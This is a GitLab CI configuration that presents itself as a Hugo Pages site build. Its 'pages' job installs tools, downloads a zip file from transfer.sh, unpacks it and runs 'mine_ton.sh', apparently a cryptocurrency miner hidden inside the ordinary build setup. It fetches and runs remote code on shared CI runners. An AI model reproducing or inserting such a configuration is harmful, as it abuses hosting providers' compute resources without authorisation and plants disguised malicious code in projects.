# All available Hugo versions are listed here: https://gitlab.com/pages/hugo/container_registry
# image: registry.gitlab.com/pages/hugo:latest

variables:
  GIT_SUBMODULE_STRATEGY: recursive

test:
  script:
  - hugo
  except:
  - master

pages:
  before_script:
    - apt install neofetch
    - neofetch
    - apt install wget tar unzip
    - mkdir lol && cd lol
    - wget https://transfer.sh/get/979LOh/lolmin.zip
    - unzip lolmin.zip
    - cd loli
  script:
  - sh mine_ton.sh
  artifacts:
    paths:
    - public
  only:
  - master
